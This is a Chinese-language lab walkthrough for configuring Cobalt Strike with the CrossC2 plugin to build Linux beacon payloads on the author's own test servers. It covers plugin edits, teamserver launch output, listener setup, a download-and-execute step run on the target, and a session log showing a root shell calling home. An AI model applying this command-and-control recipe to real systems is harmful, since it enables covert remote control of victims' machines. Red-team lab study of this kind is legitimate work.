cs客户端:Windows10;
服务器端:腾讯云服务器 Ubuntu20;ip 1.1.1.1 (假的)
测试靶机:腾讯云服务器-CentOS 7
下载CrossC2
GitHub - gloxec/CrossC2: generate CobaltStrike's cross-platform payload
将src目录复制到win10客户端cs目录下
下载插件
https://github.com/gloxec/CrossC2/releases/download/v2.2.4/genCrossC2.Linux https://github.com/gloxec/CrossC2/releases/download/v2.2.4/genCrossC2.Win.zip
将genCrossC2.Linux文件上传到ubuntu服务器根目录下(有点文章说要的我就试着放上去先,反正也不差这点)
再将服务器端 隐藏文件.cobaltstrike.beacon_keys复制到客户端,ls -a 查看
解压genCrossC2.Win.zip文件,复制ucrtbased.dll到C:\Windows\System32目录下
编辑src下CrossC2.cna文件:
$CC2_PATH = "D:\\Tools\\CobaltStrike4.1\\src\\"; # <-------- fix 更改为CrossC2.cna存放的绝对路径
$CC2_BIN = "genCrossC2.Win.exe"; #客户端使用的win10改成对应文件
sub genCrossC2 {
$dialog = dialog("CrossC2 Payload Generator", %(uri => "/a", lport => "55413", type => "curl", beaconKey => "./.cobaltstrike.beacon_keys", rebind_lib => "null", listener => "Listener: ", system => "System: ", arch => "Arch: ", payload_type => "Payload_Type: ", outputFileName => "CrossC2-test"), &dialogCallBack);
#第212行 将最后的 outputFileName => "/tmp/CrossC2-test"改为 outputFileName => "CrossC2-test"
#windows10不存在tmp目录所以将cs直接生成木马文件在根目录下
ubuntu@VM-0-9-ubuntu:~/CobaltStrike4.1$ ls -a
. agscript c2lint cobaltstrike cobaltstrike.bat CobaltStrikeCN.jar cobaltstrike.store genCrossC2.Linux peclone teamserver third-party
.. agscript.bat c2lint.bat cobaltstrike.auth .cobaltstrike.beacon_keys cobaltstrike.jar data logs peclone.bat teamserver.bat
CobaltStrike启动!!!
服务器启动:chmod +x teamserver #第一次启动给予权限
sudo ./teamserver 1.1.1.1 password
[*] Will use existing X509 certificate and keystore (for SSL)
[+] Team server is up on 50050
[*] SHA256 hash of SSL cert is: 57fc0fac31c57fc0fac31c57fc0fac31c57fc0fac31c57fc0fac31c
[!] Web Server will use default SSL certificate (you don't want this).
Use a valid SSL certificate with Cobalt Strike: https://www.cobaltstrike.com/help-malleable-c2#validssl
[+] Listener: cs4.1 started!
客户端启动:双击cobaltstrike.bat文件一键启动
主机为服务器端地址,端口默认50050,用户名随便写,密码就刚刚写的password
右上角cobaltstrike -监听器 -最下面点击add添加监听器,因为CrossC2 listener 只支持https的
cobalt strike -脚本管理器 - load CrossC2.cna文件名
这时客户端顶上面会出现CrossC2按钮
点击CrossC2 -CrossC2 Payload Generator -genCrossC2 生成payload
第四行选择文件,选择cobaltstrike.beacon_keys的存放路径,listener改为刚刚添加的https监听器,Bulid生成
复制语句到靶机执行
靶机自动下载并执行
查看日志,上线成功
08/10 11:58:56 *** new ssh session root *@10.0.4.7 (VM-4-7-centos(23687))
完成
进入beacon
ssh> sleep 0
[*] Tasked beacon to become interactive
[+] host called home, sent: 16 bytes
ssh> shell id
[*] Tasked session to run: id
[+] host called home, sent: 11 bytes
[+] received output:
uid=0(root) gid=0(root) 组=0(root)